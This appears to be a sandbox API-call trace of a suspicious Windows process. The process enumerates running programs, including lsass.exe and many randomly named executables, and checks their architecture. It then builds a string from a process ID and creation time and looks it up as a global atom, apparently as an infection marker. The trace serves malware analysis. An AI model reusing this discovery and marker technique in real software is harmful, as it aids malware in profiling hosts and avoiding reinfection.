	[0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5a18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d568, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.693] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.693] CloseHandle (hObject=0x698) returned 1
	[0122.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.694] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.694] CloseHandle (hObject=0x698) returned 1
	[0122.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.694] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.694] CloseHandle (hObject=0x698) returned 1
	[0122.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.694] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.694] CloseHandle (hObject=0x698) returned 1
	[0122.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.695] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.695] CloseHandle (hObject=0x698) returned 1
	[0122.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.695] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.695] CloseHandle (hObject=0x698) returned 1
	[0122.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.695] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.695] CloseHandle (hObject=0x698) returned 1
	[0122.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.696] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.696] CloseHandle (hObject=0x698) returned 1
	[0122.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.696] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.696] CloseHandle (hObject=0x698) returned 1
	[0122.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.697] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.697] CloseHandle (hObject=0x698) returned 1
	[0122.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.697] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.697] CloseHandle (hObject=0x698) returned 1
	[0122.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.697] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.697] CloseHandle (hObject=0x698) returned 1
	[0122.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.698] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.698] CloseHandle (hObject=0x698) returned 1
	[0122.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d6b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.698] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.698] CloseHandle (hObject=0x698) returned 1
	[0122.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.698] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.698] CloseHandle (hObject=0x698) returned 1
	[0122.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b96e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.699] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.699] CloseHandle (hObject=0x698) returned 1
	[0122.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.699] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.699] CloseHandle (hObject=0x698) returned 1
	[0122.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.699] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.699] CloseHandle (hObject=0x698) returned 1
	[0122.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.700] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.700] CloseHandle (hObject=0x698) returned 1
	[0122.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.700] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.700] CloseHandle (hObject=0x698) returned 1
	[0122.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.701] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.701] CloseHandle (hObject=0x698) returned 1
	[0122.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.701] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.701] CloseHandle (hObject=0x698) returned 1
	[0122.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.701] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.701] CloseHandle (hObject=0x698) returned 1
	[0122.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.702] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.702] CloseHandle (hObject=0x698) returned 1
	[0122.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.702] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.702] CloseHandle (hObject=0x698) returned 1
	[0122.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.702] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.702] CloseHandle (hObject=0x698) returned 1
	[0122.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.703] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.703] CloseHandle (hObject=0x698) returned 1
	[0122.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.703] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.703] CloseHandle (hObject=0x698) returned 1
	[0122.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.703] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.703] CloseHandle (hObject=0x698) returned 1
	[0122.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.704] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.704] CloseHandle (hObject=0x698) returned 1
	[0122.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.704] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.704] CloseHandle (hObject=0x698) returned 1
	[0122.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.704] GetLastError () returned 0x5
	[0122.704] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.705] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.706] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.706] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.706] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.707] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetLastError () returned 0x5
	[0122.708] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.708] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.709] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.709] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.709] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.709] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.709] CloseHandle (hObject=0x698) returned 1
	[0122.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
